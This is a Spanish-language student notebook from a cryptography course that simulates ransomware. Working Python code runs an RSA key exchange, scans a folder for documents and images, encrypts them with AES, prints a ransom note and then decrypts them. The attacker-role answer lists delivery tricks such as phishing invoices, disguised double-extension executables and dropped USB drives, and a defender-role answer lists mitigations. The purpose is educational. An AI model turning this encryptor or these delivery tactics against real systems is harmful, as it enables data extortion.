# Proyecto de Criptografía - Simulación de Ransomware

In [2]:
# Instalar librerias
!pip install pycryptodome gdown
# Descarga los archivos desde tu carpeta pública en Drive
!gdown --folder https://drive.google.com/drive/folders/1q1s_jsqEcsmQfKkV5W8rwSaTgnt8G232?usp=sharing

Retrieving folder contents
Processing file 141Z4dExakyhQYMOpYFDYZpRDQVWj7fxd archivo1.txt
Processing file 184jOD65kvt83t4vxEqQ2y2JYtuijoRKg archivo2.txt
Retrieving folder contents completed
Building directory structure
Building directory structure completed
Downloading...
From: https://drive.google.com/uc?id=141Z4dExakyhQYMOpYFDYZpRDQVWj7fxd
To: /home/sergio/Escritorio/U/Final_Criptografia/victima_archivos/archivo1.txt
100%|██████████████████████████████████████████| 455/455 [00:00<00:00, 2.76MB/s]
Downloading...
From: https://drive.google.com/uc?id=184jOD65kvt83t4vxEqQ2y2JYtuijoRKg
To: /home/sergio/Escritorio/U/Final_Criptografia/victima_archivos/archivo2.txt
100%|██████████████████████████████████████████| 799/799 [00:00<00:00, 2.29MB/s]
Download completed


In [3]:
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.Random import get_random_bytes
import os

### Generar llaves RSA y certificados

In [4]:
def generar_certificado(id_str):
    key = RSA.generate(2048)
    pub_key = key.publickey()
    cert = {'id': id_str, 'pk': pub_key}
    return cert, key

cert_victima, key_priv_victima = generar_certificado("victima_001")
cert_atacante, key_priv_atacante = generar_certificado("atacante_001")

### Protocolo AKE v.2

In [5]:
def protocolo_ake_v2(cert_emisor, priv_emisor, cert_receptor):
    K = get_random_bytes(128)  # 1024 bits
    hash_K = SHA256.new(K)
    firma = pkcs1_15.new(priv_emisor).sign(hash_K)

    cipher_rsa = PKCS1_OAEP.new(cert_receptor['pk'])
    K_cifrado = cipher_rsa.encrypt(K)

    cipher_rsa_receptor = PKCS1_OAEP.new(key_priv_victima if cert_receptor['id'] == "victima_001" else key_priv_atacante)
    K_descifrado = cipher_rsa_receptor.decrypt(K_cifrado)

    hash_recibido = SHA256.new(K_descifrado)
    try:
        pkcs1_15.new(cert_emisor['pk']).verify(hash_recibido, firma)
        print("✔️ Firma válida. Secreto compartido establecido.")
        return K_descifrado
    except (ValueError, TypeError):
        print("❌ Firma inválida.")
        return None

K_compartido = protocolo_ake_v2(cert_atacante, key_priv_atacante, cert_victima)

✔️ Firma válida. Secreto compartido establecido.


### Derivación de llave simétrica

In [6]:
def derivar_llave(K):
    return SHA256.new(K).digest()

llave_simetrica = derivar_llave(K_compartido)

### Escanear archivos

In [7]:
def escanear_archivos_victima(ruta_base, extensiones_permitidas=None):
    archivos_encontrados = []
    for carpeta_actual, _, archivos in os.walk(ruta_base):
        for archivo in archivos:
            ruta_completa = os.path.join(carpeta_actual, archivo)
            if extensiones_permitidas:
                if any(archivo.lower().endswith(ext) for ext in extensiones_permitidas):
                    archivos_encontrados.append(ruta_completa)
            else:
                archivos_encontrados.append(ruta_completa)
    return archivos_encontrados

In [8]:
ruta_base = "victima_archivos"
archivos_objetivo = escanear_archivos_victima(ruta_base, extensiones_permitidas=[".txt", ".pdf", ".jpg", ".png"])

### Cifrar archivos

In [9]:
def cifrar_archivo(path, key):
    with open(path, 'rb') as f:
        datos = f.read()

    hash_original = SHA256.new(datos).hexdigest()

    iv = get_random_bytes(16)
    cipher = AES.new(key, AES.MODE_CBC, iv)

    padding_len = 16 - len(datos) % 16
    datos += bytes([padding_len]) * padding_len

    cifrado = cipher.encrypt(datos)

    ruta_cifrado = path + ".enc"
    with open(ruta_cifrado, 'wb') as f:
        f.write(iv + cifrado)

    return ruta_cifrado, hash_original
hashes_originales = {}
for archivo in archivos_objetivo:
    ruta_cifrado, h = cifrar_archivo(archivo, llave_simetrica)
    hashes_originales[ruta_cifrado] = h

print("\n🚨 Tus archivos han sido cifrados:")
for path in hashes_originales:
    print(f" - {path}")
print("\nPara recuperar tus archivos, paga 0.01 BTC a la dirección: bc1qexample123456789\n")


🚨 Tus archivos han sido cifrados:
 - victima_archivos/archivo1.txt.enc
 - victima_archivos/archivo2.txt.enc

Para recuperar tus archivos, paga 0.01 BTC a la dirección: bc1qexample123456789



### Decifrar archivos

In [10]:
def descifrar_archivo(path_cifrado, key):
    with open(path_cifrado, 'rb') as f:
        contenido = f.read()
    iv = contenido[:16]
    cifrado = contenido[16:]

    cipher = AES.new(key, AES.MODE_CBC, iv)
    datos_descifrados = cipher.decrypt(cifrado)

    padding_len = datos_descifrados[-1]
    datos_descifrados = datos_descifrados[:-padding_len]

    path_original = path_cifrado.replace(".enc", ".descifrado")
    with open(path_original, 'wb') as f:
        f.write(datos_descifrados)

    return SHA256.new(datos_descifrados).hexdigest()

print("🔓 Simulando el pago y restauración...")

for archivo_cifrado, hash_original in hashes_originales.items():
    hash_descifrado = descifrar_archivo(archivo_cifrado, llave_simetrica)
    if hash_descifrado == hash_original:
        print(f"✅ {archivo_cifrado} descifrado correctamente. Integridad verificada.")
    else:
        print(f"❌ Error en integridad para {archivo_cifrado}.")

🔓 Simulando el pago y restauración...
✅ victima_archivos/archivo1.txt.enc descifrado correctamente. Integridad verificada.
✅ victima_archivos/archivo2.txt.enc descifrado correctamente. Integridad verificada.


---

## **Preguntas**

### **Pregunta 1**
#### Asuman el rol del atacante. Imaginen que realizan una implementación funcional y real de su malware y lo convierten en un arma de ataque. ¿Qué estrategias utilizarían para que la víctima lo instale en su máquina? Es decir, ¿cómo implementarían el paso 1 descrito en la operación?


#### **Respuesta:**
Desde el rol del atacante, una estrategia común y efectiva para lograr que la víctima instale el ransomware es el uso de **ingeniería social** a través de **correos electrónicos de phishing**. En este contexto, podríamos camuflar nuestro ransomware como un archivo legítimo (por ejemplo, una factura en PDF o un documento Word con macros maliciosas) y adjuntarlo a un correo convincente que inste al usuario a abrirlo.

Aunque nuestro proyecto fue implementado de forma simulada en Google Colab (y no ejecutado directamente en una máquina real), si quisiéramos adaptarlo a un entorno real, podríamos:

* Convertir el script en un ejecutable `.exe` o `.pyw` (en Windows), ocultando la consola.
* Incluirlo en un archivo comprimido `.zip` o `.rar`, con nombres atractivos como `ReciboPago_BancoXYZ.pdf.exe`.
* Configurar el malware para que se autoejecute al abrir el archivo y comience el proceso de cifrado descrito (intercambio de llaves, derivación, cifrado de archivos).

Otra opción sería **usar una unidad USB comprometida**, dejarla abandonada en lugares estratégicos (como oficinas), y confiar en que alguien la conecte. Esto explotaría la curiosidad humana para ejecutar el malware voluntariamente.

---

### **Pregunta 2**

#### Asuman el rol del defensor. Describan políticas y prácticas para garantizar la confidencialidad, la integridad y la disponibilidad de recursos informáticos en una organización. En particular, estas políticas y prácticas deberían mitigar la ocurrencia de este tipo de ataques.

#### **Respuesta:**

Desde el rol del defensor, la mejor forma de mitigar ataques de ransomware como el desarrollado en este proyecto es aplicar el **modelo de seguridad CIA**: **Confidencialidad, Integridad y Disponibilidad**.

Con base en lo que nuestro ransomware simulado realiza (cifrado de archivos tras un intercambio de llaves y notificación de rescate), estas serían las políticas clave:

**1. Confidencialidad**

* **Restricción de permisos de usuario**: limitar el acceso a archivos sensibles solo a usuarios autorizados.
* **Uso de software antivirus y antimalware actualizado** que pueda detectar firmas de ransomware conocidos o comportamiento sospechoso como acceso masivo a archivos.

**2. Integridad**

* **Verificación de integridad mediante hash**: así como en nuestro proyecto se comparan hashes SHA-256 para detectar modificaciones, en un sistema real se puede hacer auditoría continua de archivos críticos.
* **Política de control de cambios**: los archivos sensibles deben tener seguimiento de versiones y permisos de escritura restringidos.

**3. Disponibilidad**

* **Copias de seguridad periódicas (backups offline)**: esto es fundamental. Si el ransomware cifra todos los archivos, el usuario puede restaurar desde una copia reciente sin necesidad de pagar.
* **Segmentación de red y control de ejecución de scripts**: esto evita la propagación del ransomware en entornos corporativos.
* **Simulacros de recuperación ante desastres**: entrenar al personal en qué hacer si ocurre un ataque.